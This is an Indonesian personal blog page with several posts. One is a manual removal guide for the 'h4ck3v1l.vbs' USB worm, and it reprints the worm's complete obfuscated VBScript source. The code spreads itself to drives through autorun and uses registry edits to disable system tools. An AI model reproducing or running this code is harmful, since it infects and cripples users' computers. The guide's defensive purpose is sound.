Wednesday, December 31, 2008

Selamat Tahun Baru 2009


Saya mengucapkan :

"SELAMAT TAHUN BARU 2009... "

Semoga apa yang telah kita lakukan di alam maya ini dapat menjadikan kita sebagai orang yang selalu beriman dan bertakwa kepada-Nya, selalu berani melakukan hal-hal yang positif yang mengarahkan kejalan kebaikan serta merupakan tahun yang membawakan sukses kepada kita semua. Amin...

Tengku Khairil Ahsyar (sekeluarga)
Read more >>

Tuesday, December 30, 2008

Cara Membunuh Virus h4ck3v1l.vbs

Akhir bulan Desember ini saya disibukkan dengan datangnya tamu yang ga' diundang ke kompi saya. Sebenarnya memang udah tau sih kalau kompi saya bakal kedatangan tamu yang ga' diundang itu, soalnya ga' ada cara lain lagi buat ngumpulin tugas adek-adek yang lagi belajar buat website statik, dan kebetulan kemaren itu waktunya mepet kali untuk ngumpulin tugas, jadi terpaksa anunya(flashdisk) di colokin kekomputer saya. Awalnya sih memang di scan terlebih dahulu ama antivirus luar yang ter-update, tapi ga' ada satupun yang kedeteksi ama antivirusnya. Pusing, pusing, pusing, sakit hati iya juga, gara-gara tamunya ngerjain yang ga' seharusnya di kerjain. Gimana ga' sakit hati, menu yang di hilangin antara lain adalah :

1. Run (yang keluar malah notepad dgn bahasa amburadul)
2. Search (fasilitas pencarian file/folder)
3. Command Promt (yang keluar adalah tulisan amburadul juga di aplikasi notepad)
4. Task Manager(Ctrl+Alt+Del) (yang keluar masih tulisan amburadul)
5. Regedit (sama dengan yang diatas, errornya)
6. Menu Options pada windows explorer di hilangin juga,
7. Parahnya lagi, pake acara hidden file dan ga' bisa nginstal aplikasi apapun.

Tapi ga' pha2x... sekarang saya udah tau gimana caranya ngilangin virus ini. Rupanya virus ini lebih asyik dihilangin dengan cara manual dibandingkan dengan menggunakan antivirus. Gimana ya... caranya ? he.. he.. he.. sabar dikit mas...

Sebelumnya kamu harus punya peralatan perangnya dulu (buat yang trouble-nya mirip dengan diatas). Kamu bisa download peralatan perangnya di blognya PC Guru atau dapat juga download pada link dibawah ini :
1. Regalyzer (pengganti Registry Editor)
2. Freecommander (pengganti Windows Explorer buat lihat file yang di hidden)

Jangan lupa Antivirus yang handal buat men-scan jika telah selesai dibunuh virusnya. Atau pengen download aplikasi lain sebagai pendukung jika dianggap perlu untuk proses eksekusi virusnya.

Kira-kira step-step yang harus kita lakukan adalah sbb:
1. Non aktifkan(disable) dulu System Restore
2. Restart komputernya
3. Masuk ke safe mode
4. Buka Regalyzer, cari file yg berhubungan dg h4ck3v1l.vbs(gunakan fasilitas Find)
5. Hapus/modifikasi values yang berhubungan dengan h4ck3v1l.vbs pada Regedit
6. Restart lagi komputernya
7. Buka freecommander cari dan hapus setiap file yg berhubungan dgn h4ck3v1l.vbs
8. Hapus semua file temp IE
9. Matikan proses/service/startup h4ck3v1l.vbs (jika masih ditemukan di Msconfig)
10. Terakhir scan dengan menggunakan antivirus buat siaga akhir.
11. Enjoy...

Berikut saya tampilkan source code h4ck3v1l.vbs
'h4ck3v1l.vbs
on error resume next
dim mysource,winpath,HGjYuiyJWX,fs,mf,atr,tf,rg,nt,check,sd
atr = fNIOEKUfRA("^ovspuvb\")&vbcrlf&fNIOEKUfRA("tcw/m2w4ld5i!fyf/uqjsdtx>fuvdfyfmmfit")
set fs = createobject(fNIOEKUfRA("udfkcPnfutzTfmjG/hojuqjsdT"))
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes = 32
set tf=fs.createtextfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes = 39
for each HGjYuiyJWX in fs.drives
If (HGjYuiyJWX.drivetype = 1 or HGjYuiyJWX.drivetype = 2) and HGjYuiyJWX.path <> fNIOEKUfRA(";B") then
set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes =32
set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"))
tf.attributes =39
set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"))
tf.attributes = 32
set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"),2,true)
tf.write atr
tf.close
set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"))
tf.attributes=39
end if
next
set rg = createobject(fNIOEKUfRA("mmfiT/uqjsdTX"))
rg.regwrite fNIOEKUfRA("]eobnnpd]mmbutoJ]mmfit]fmjggoj]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjghfs]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm")
rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjg4qn]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("tcw/m2w4ld5i")
rg.regwrite fNIOEKUfRA("sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("zbmqtjEtnfuJzbsUpO")
rg.regwrite fNIOEKUfRA("ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("fyf/qnbojX]qnbojX]tfmjG!nbshpsQ];D"), fNIOEKUfRA("HOJSUT`HFS")
rg.regwrite fNIOEKUfRA("topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA(fNIOEKUfRA("2")), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO")
rg.regwrite fNIOEKUfRA("m2w4ld5i]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),winpath&fNIOEKUfRA("tcw/m2w4ld5i]")
rg.regwrite fNIOEKUfRA("fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("mu/fhbq/777mfsvB/xxx00;quui")
rg.regwrite fNIOEKUfRA("fmujU!xpeojX]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("777!MFSVB!ZC!EFLDBI")
rg.regwrite fNIOEKUfRA("sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("777!mfsvB"),fNIOEKUfRA("HOJSUT`HFS")
rg.regwrite fNIOEKUfRA("opjub{jobhsPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("4d2m1Q!juoB"),fNIOEKUfRA("HOJSUT`HFS")
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(fNIOEKUfRA("mmfit/uqjsdtX"))
sd.run winpath&fNIOEKUfRA("!$udfmft0$f0!fyf/sfspmqyf]")&Wscript.ScriptFullname
Function fNIOEKUfRA(eaYRjLasVU)
Dim i, tmp2
For i = 1 To Len(eaYRjLasVU)
tmp2 = Chr(Asc(Mid(eaYRjLasVU, i, 1)) - 1) + tmp2
Next
fNIOEKUfRA = tmp2
End Function
Untuk informasi pendukung lainnya, silahkan tanya dengan paman google atau gabung dengan teman-teman dimillis yang membahas masalah virus. Thnks... selamat mencoba !
Read more >>

Sunday, December 28, 2008

Rencana Liburan Semester

Tidak terasa liburan semester telah tiba (bagi anak sekolahan, kalau yang kuliah hampir tiba). Sekarang waktunya merencanakan tempat liburan yang tepat untuk dikunjungi. Paling asyik kalau pergi liburan bersamaan dengan keluarga, saudara, teman, dll. Yang jelas tidak sendirian. Tapi bagaimana pula kalau pas liburannya tidak ada satu orangpun yang bisa diajak untuk liburan ? Nah, dibawah ini akan saya uraikan (menurut saya) mengenai liburan yang tepat untuk kita. Siapa tau nantinya bisa membantu teman-teman dalam mencari hal-hal terbaru dalam berlibur. Yang jelas, teman-teman sekalian bisa memilih mana yang cocok untuk teman-teman jalani. Kalau ga' ada yang cocok berarti artikel saya ini saya jadiin saran bagi teman-teman sekalian.

Wisata Alam (Jika liburannya bersama keluarga)
Pantai misalnya, merupakan tempat yang sangat cocok dikunjungi bagi keluarga, disana kita dapat melihat pemandangan dan panorama alam tepi laut yang indah yang serasi untuk melepaskan tegang yang ada dalam fikiran kita selama disekolah, kantor, dll. Pantai juga memberikan nuansa khusus bagi pengunjungnya dengan objek-objek yang alami dan warna warni tumbuh-tumbuhan yang mampu membuat suasana menjadi santai dan langgeng bersama keluarga. 
Selain pantai, danau sama juga halnya dengan pantai. Panorama alam yang berkombinasi antara air, hutan dan udara membuat nuansa jadi tambah rileks dan nyaman.
Air Terjun, air terjun juga merupakan salah satu wisata alam yang juga menarik untuk dikunjungi. Banyak sekali wisata alam air terjun yang terdapat di Indonesia, dengan berada didekat air terjun rasanya bisa membuat kita terbuai dengan irama-irama klasik alami yang dapat membersihkan pikiran dari kesibukan-kesibukan yang telah dilakukan selama ini.
Telaga Air Panas, selain dapat meringankan beban fikiran, telaga air panas juga dapat menyembuhkan berbagai macam penyakit yang ada pada tubuh kita. Salah satunya adalah penyakit kulit. Dengan berendam di air yang suhunya tinggi, dapat menghilangkan penyakit kulit yang ada pada tubuh kita, sehingga dapat membuat tubuh menjadi fugar dan sehat kembali.

Ke Kebun Binatang (Jika liburannya bersama keluarga)
Bersama keluarga dan anak-anak alangkah baiknya jika kita mengajak mereka untuk pergi berlibur ke Kebun Binatang. Mungkin bagi anak-anak, berkunjung kekebun binatang merupakan suatu pengalaman baru untuk menambah wawasan mereka mengenal seputar dunia hewan.

Ke Rumah Nenek/Kakek Dikampung (Jika liburannya bersama keluarga)
Apasalahnya sih mudik kekampung diluar suasana hari raya, masalahnya yang diutamakan adalah silaturrahmi antara keluarga. Semakin banyak berkunjung, semakin erat pula silaturrahmi antara satu dengan yang lainnya. Jadi, apasalahnya jika liburan kali ini disempatkan untuk berkunjung kerumah kerabat yang berada dikampung halaman (Desa) sambil menikmati pemandangan-pemandangan yang ada didesa.

Memancing (Jika liburannya sendiri)
Disini saya tidak membela bagi teman-teman yang hobinya mancing, tapi menurut saya jika tidak ada orang lain lagi yang bisa diajak untuk berlibur, mungkin memancing ikan merupakan kegiatan yang juga tidak kalah menarik pula untuk di jadikan sebagai pengisi kekosongan dihari libur. Memancing tidak hanya bisa dilakukan di tengah laut saja, sekarang sudah banyak tempat-tempat memancing buatan yang sengaja dibuat ditengah kota untuk memenuhi kebutuhan para pemancing maniak. Jadi tanpa perlu repot-repot untuk menyewa kapal untuk memancing ditengah laut. Cukup pergi ketempat (kolam) pancing terdekat lalu mancing deh disana...

Menyalurkan Bakat atau Hobby (Jika liburannya sendiri)
Jika kegiatan yang lain tidak cocok dengan keinginan hati, teman-teman sekalian dapat melakukan liburan dengan menambahkan waktu eksrakurikulernya lebih banyak. Misalkan latihan musik, drama, teater, olahraga, belajar dll. Mungkin ini adalah cara terakhir untuk teman-teman sekalian dari pada waktu liburnya habis terbuang percuma, mendingan teman-teman tambahin aja waktu ekstrakurikulernya, kan lumayan buat memantapkan ilmunya.

Bersih-bersih Rumah (Jika liburannya sendiri)
Jika teman-teman sekalian ada yang ngekos atau mungkin tinggal serumah bersama orang lain atau mungkin saudaranya, disini saya sarankan untuk mengisi waktu luangnya dalam melakukan pembenahan-pembenahan terhadap rumah kediamannya. Mungkin dengan adanya waktu luang selama seminggu dapat memperbaiki waktu yang terlewatkan selama satu semester. Jadi bagi yang numpang sama orang lain, harap mengertilah dengan kondisi tempat numpangnya. Masa sih sudah dikasi numpang, e... malah ga' mau bantuin bersih-bersih dirumahnya. Selain itu bisa menambah pujian dari orang rumah tempat numpangnya.

OutBound (Jika Liburannya Sama Teman-teman)
Nah... liburan yang satu ini merupakan liburan yang sangat spesial buat teman-teman sekalian, masalahnya jarang-jarang sekali orang pengen melakukan liburan ini bersama teman-teman yang lain. Untuk liburan ini, kita tidak perlu menyewa tempat yang mewah, cukup dengan memanfaatkan alam sekitar kita saja saya rasa sudah cukup. Yang penting yang perlu diingat adalah inti dari permainan(game) Outbound nya. Jika teman-teman mempunyai suatu tim work, liburan Outbound ini saya rasa sangat cocok untuk dilakukan pada tim anda. Karena dengan melakukan outbound ini, tim anda akan semakin solid, mental anda akan semakin tebal, rasa percaya diri, sifat pemimpin dan tim yang anda punya akan semakin kompak dalam melakukan kegiatan-kegiatan yang bersifat tim work. Ingat lho, dengan outbound kita akan lebih mengetahui bagaimana cara bertanggung jawab atas tim work yang kita miliki dan apa saja yang harus kita lakukan demi kesuksesan tim work kita.

Haiking (Jika Liburannya Sama Teman-teman)
Haiking menurut saya liburan yang tak kalah menyenangkan buat kaulamuda. Apalagi haiking itu menurut saya menambah wawasan teman-teman akan bagaimana cara kita berpetualang ke alam bebas. Melihat alam, melewati bebukitan, sungai, hutan dll. Tidak kalah serunya seperti Outbound, dengan haiking kita juga bisa membentuk jiwa kepemimpinan dalam satu kelompok dan akan menambah kekompakan kita dalam melakukan aktivitas yang melibatkan kelompok. Haiking juga dapat membentuk mental seseorang dalam menghadapi alam dan belajar menjadi seorang yang mandiri dalam satu tim.

Museum (Jika Liburannya Sama Teman-teman)
Sebenarnya ke museum ini dapat juga kita lakukan sendiri. Tapi menurut saya, alangkah serunya jika kita mengajak teman untuk berkunjung ke museum, yah... siapa tau bisa nambah teman bicara saat perjalanan. Selain itu ke museum juga dapat mengingatkan kita kembali akan sejarah-sejarah silam yang pernah terjadi dan merupakan ilmu pengetahuan yang secara tidak langsung kita ketahui pada saat kita berkunjung ke museum.

Pameran (Jika Liburannya Sama Teman-teman)
Kalau yang satu ini saya sarankan bagi teman-teman yang memiliki rasa keingintahuannya yang tinggi akan seputar dunia informasi terbaru. Dengan berkunjung ke tempat-tempat pameran yang kebetulan ada saat waktu libur dapat menambah pengetahuan kita tentang perkembangan zaman yang ada, dan dapat saling berinteraksi dengan para pembisnis-pembisnis yang ada di tempat pameran. Ingat lho, jangan pernah malu untuk bertanya ditempat pameran jika ada sesuatu yang tidak kita ketahui.

Nonton Bioskop (Jika Liburannya Sama Teman-teman)
Saya tidak terlalu menganjurkan kepada teman-teman untuk nonton bioskop, masalahnya nonton bioskop membutuhkan modal juga untuk kesana. Syukur-syukur kalo nontonnya cuma sekali, tapi kalau seandainya setiap hari selama seminggu, bisa tekor juga tuh. Jadi untuk yang satu ini tidak saya rekomendasikan untuk diikuti.

Saya rasa cukup sampai disini dulu ide-ide saya, mungkin kalau masih ada yang tertinggal akan saya tambahkan lagi. Mudah-mudahan rencana teman-teman yang pengen berlibur bisa sedikit saya bantu dengan beberapa ide saya diatas. Laen kali kita sambung lagi, bye... 

Keyword :
Liburan, rekreasi, refresing, perai, jalan-jalan, piknik, santai-santai, wisata, holiday, pergi nonton, bioskop, pantai, laut, gunung, moll, mall, pameran, musium, haiking, out bound, hoby, memancing, gunung

Read more >>

Saturday, December 27, 2008

K9 Web Protection Cegah Situs Porno

Berinternet ria pada saat sekarang ini tidak hanya dapat dilakukan pada orang-orang dewasa saja, anak-anak kecil seusia SD pun sekarang sudah banyak tahu dan mengenal internet, browsing, chatting, game online dsb. Sekarang zaman sudah cukup canggih dan tidak mengenal asal muasal usernya lagi, apakah besar, kecil, tua maupun muda. Yang jelas selagi user bisa menggunakan teknologi tersebut, maka ialah yang menjadi pengendali teknologi tersebut. Disini saya ingin sedikit berbagi informasi buat para orang tua yang memiliki akses internet dirumah, dan sudah memperkenalkan internet kepada para buah hatinya, siapa tau bisa membantu para orang tua dalam mengawasi anak-anaknya bermain internet. Seperti yang telah saya sebutkan diatas tadi mengenai kejahatan internet, pada saat sekarang ini berinternet telah banyak merusak dan merubah nilai-nilai moral manusia. Hal ini juga tidak hanya ditujukan kepada orang dewasa saja, anak-anak kecilpun sudah banyak yang dapat mengakses situs-situs yang tidak seharusnya mereka konsumsi. Informasi-informasi yang tidak seharusnya mereka baca-pun bukan menjadi rahasia umum lagi bagi anak-anak. Banyak sekali seusia mereka tanpa sungkan-sungkan dan tanpa rasa malu mengakses situs pornografi dan pornoaksi tersebut. Nah... bagaimanakah salah satu cara yang bisa di lakukan para orang tua dirumah agar supaya buah hati mereka tidak dapat mengakses situs-situs yang tidak seharusnya mereka konsumsi..?

Dengan alamat http://www1.k9webprotection.com para orang-orang tua dirumah dapat mendownload sebuah software yang dapat mencegah buah hatinya membuka informasi-informasi yang tidak seharusnya dikonsumsi. Seperti iklan-iklan pornografi, situs pornografi dan pornoaksipun dapat di filter dengan menggunakan software ini. Dengan hanya meregistrasi lewat e-mail, dan menunggu balasan lewat e-mail juga, kita akan di berikan lisensi penuh dalam menggunakan aplikasi tersebut. Disini juga tersedia untuk Sistem Operasi Mac OS. Jadi tunggu apa lagi silahkan daftar disini atau dapat juga meng-copy paste alamat http://www1.k9webprotection.com/getk9/index.php di web browser anda. Oh... ya di web tempat anda mendownload software tersebut juga ada User Manualnya juga lho...! Jadi, sekarang para orang tua tidak perlu khawatir lagi dalam mengawasi anak-anaknya bermain internet dirumah. Buruan...! Cegah pornografi dan pornoaksi bagi generasi penerus kita sedini mungkin...!
Read more >>

Wednesday, December 24, 2008

Menghilangkan Stres Ala Ayel

Stresss… stress.. stres. Penyakit yang satu ini dapat menyerang siapa saja, kecil, besar, tua maupun muda. Penyakit ini kerap kali datang pada orang-orang yang memiliki fikiran yang kalut, tidak mau berfikir jernih, tidak tenang, was-was, banyak sekali masalah yang tidak dapat diselesaikan secara pribadi, atau mungkin bisa saja memaksakan fikirannya, padahal yang ada otaknya tidak mampu untuk memikirkan hal tersebut. Selain dari pada itu, bagi kondisi tubuh yang kurang sehat juga dapat menyebabkan stres, walaupun stres yang dihadapi adalah stres ringan. Kecuali penyakit yang dideritanya merupakan penyakit yang penyembuhannya dalam jangka waktu yang lama atau mungkin tipis harapan untuk disembuhkan. Disini saya hanya ingin sedikit berbagi pengalaman dan cerita mengenai “cara menghilangkan stres”. Mudah-mudahan bisa menjadi bahan bacaan yang menarik dan ada manfaatnya buat kita semua.

Adapun Cara menghilangkan stres Ala Ayel diantaranya adalah :

  1. Istirahat atau Tidur Yang Cukup. Manusia di ibaratkan seperti sebuah mesin yang bergerak secara terus menerus. Selama manusia itu masih bisa bernafas, berarti mesin yang ada dalam tubuh manusia tersebut bergerak. Nah, kalau mesin (katakanlah seperti mesin motor) di hidupkan secara terus menerus tanpa henti, pasti mesin tersebut akan kepanasan. Mesin saja bisa kepanasan apalagi manusia. Itulah gunanya istirahat, yang mana fungsinya dapat mengembalikan semula tenaga-tenaga yang masih tersimpan dalam tubuh manusia dan juga dapat mengembalikan fungsi saraf otak agar dapat kembali berfikir jernih setelah sekian lama berfikir. Jadi bukan hanya tenaga manusia saja yang harus beristirahat, otak juga perlu istirahat. Tapi ingat..! jangan terlalu banyak Istirahat atau tidur, terlalu banyak istirahat bisa menyebabkan malas, dan terlalu banyak tidur juga bisa menyebabkan stress, walaupun stresnya ringan.
  2. Jalan-jalan atau Rekreasi. Jalan-jalan atau rekreasi merupakan salah satu kegiatan efektif yang dapat menghilangkan stres. Mengapa tidak ?!?! Jalan-jalan atau rekreasi biasanya dapat membuat orang lupa akan kegiatan-kegiatan sebelumnya, walaupun hanya bersifat sementara. Setidaknya orang tersebut bisa menenangkan fikirannya untuk mengembalikan kembali kesegaran otaknya dari masalah-masalah yang dihadapinya. Jadi dengan jalan-jalan atau rekreasi bisa menghilangkan stres dalam fikiran kita. Jalan-jalan bisa kita lakukan di tempat-tempat yang suasananya damai, tenang, tentram, adem dan banyak warna-warni alam yang cantik menghiasi tempat tujuan rekreasi kita. Misalkan di Pantai, di Gunung, di hutan, dan tempat-tempat rekreasi alam lainnya.

  3. Main Musik atau Mendengarkan Musik. Bagi saya musik itu indah, apalagi jika kita bisa memainkan alat musiknya. Musik bisa juga membuat kedamaian didalam hati kita. Dengan musik kita bisa memberikan kesegaran tersendiri bagi otak kita. Musik yang cocok dijadikan terapi stres menurut saya adalah musik yang lebih mendekati keirama klasik santai. Tidak dianjurkan untuk irama underground atau rock, kecuali memang menyenangi aliran tersebut.

  4. Nonton. Yang namanya nonton banyak sekali yang bisa ditonton. Bisa nonton TV, film/video, konser, pertunjukan pada acara-acara tertentu dan lain sebagainya. Nonton bagi saya merupakan salah satu refresing yang juga banyak membantu kita dalam menghilangkan rasa stres. Nonton cerita-cerita lucu yang ditayangkan di TV misalnya. Walaupun pada saat nonton kita tertawa sendiri, bagi saya tidak masalah. Malahan itulah yang bisa menghilangkan rasa tegang yang ada didalam fikiran kita, menghilangkan rasa emosi, menghilangkan kesuntukan kita dan membuat otak kita menjadi rileks.

  5. Main Game. Jangan pernah mengira bahwa main game adalah aktivitas yang tidak menguntungkan bagi sipemainnya. Coba lihat anak-anak kecil seusianya, jarang sekali yang terkena stres, karena fikiran yang ada pada anak kecil adalah bermain, bermain dan bermain. Kecuali bagi anak-anak kecil yang masa kecilnya memang tidak cukup waktu untuk bermain. Atau bahasa lainnya “Masa kecil kurang bahagia”. Kalau saya sih merasa perlu aja Main Game, tapi game yang sifatnya untuk pengembangan diri, dan untuk meningkatkan IQ. Tapi ingat lho, pesan saya, jangan terlalu lama main gamenya, bisa-bisa nanti kamu jadi penggammer atau yang timbul malah penyakit baru “Malas”.

  6. Curhat. Curhat (Curahan Hati) banyak sekali dilakukan oleh orang-orang, apalagi bagi seorang wanita. Wanita kebanyakan tidak seperti Pria meluahkan emosinya tanpa kontrol. Wanita kebanyakan memendam emosi ketimbang Pria (menurut saya, walaupun ga’ selamanya seperti itu). Nah, apa yang sering dilakukan oleh para wanita untuk melepaskan beban dalam hati mereka ? Biasanya dilakukan dengan Curhat sama orang terdekatnya. Sebaiknya Curhat ini tidak hanya dilakukan terhadap wanita saja, priapun tidak ada salahnya untuk melakukan hal yang demikian. Karena curhat ini dapat meringankan beban fikiran seseorang. Biasanya cara yang seperti ini banyak sekali manfaatnya, selain beban fikiran kita berkurang, kita juga bisa mendapatkan solusi dari teman curhat kita.

  7. Olahraga. Olah raga juga merupakan kegiatan terpenting didalam tubuh ktia. Orang yang sering melakukan olahraga biasanya sering bersemangat didalam melakukan aktivitas sehari-hari.  Selain itu olahraga juga bisa melancarkan peredaran darah manusia sampai keotak. Nah, jika peredaran darah didalam otak kita lancar, otomatis kita bisa terhindar dari yang namanya stres, karena orang yang memikirkan olahraga secara tidak langsung dia juga memikirkan kesehatan yang ada didalam tubuhnya. Carilah olahraga yang sekaligus bisa menyenangkan diri kita.

  8. Selesaikan Masalah Yang Sedang Dihadapi. Kebanyakan orang yang stres ditimpa berbagai macam permasalahan. Belum selesai masalah yang satu sudah datang masalah yang lainnya. Hal inilah yang membuat orang tidak bisa menemukan jalan keluar karena terlalu banyak yang difikirkannya. Jadi saran saya, bagi teman-teman yang lagi mendapat tugas atau kerjaan, selesaikanlah sesegera mungkin, dan jangan sampai tugas atau kerjaan tersebut menjadi suatu masalah baru atau beban fikiran yang larut. Makin cepat kita menyelesaikan masalah, berarti makin cepat pula kita keluar dari masalah.

  9. Bertawakal Kepada Allah. Beribadah secara khusyuk dapat menjernihkan fikiran dan menyadarkan kita akan segala kekurangan diri dihadapan Sang Pencipta. Dengan rajin beribadah dan melakukannya sceara khusyuk, niscaya kita akan sadar sebelum kita melakukan perbuatan-perbuatan yang tidak terpuji. Jika segala cara sudah dilakukan dengan maksimal dan ternyata tidak membuahkan hasil yang baik. Sebaiknya kita bertawakal Kepada Allah (Bagi umat Islam) atau berserah diri kepada-Nya, karena kita berasal dari pada-Nya dan kita kembalipun hanya kepada-Nya.

  10. Mungkin dari saya cuma itu yang dapat saya sampaikan kepada teman-teman. Mudah-mudahan bermanfaat buat kita semua. Dan saya harapkan kepada teman-teman untuk terus menjaga kesehatan. Karena jika tubuh kita tidak sehat akan dapat mengganggu fikiran kita. -@-

Read more >>

Tuesday, December 16, 2008

Serupa Tapi Beda Usia

sd mts sma kuliah

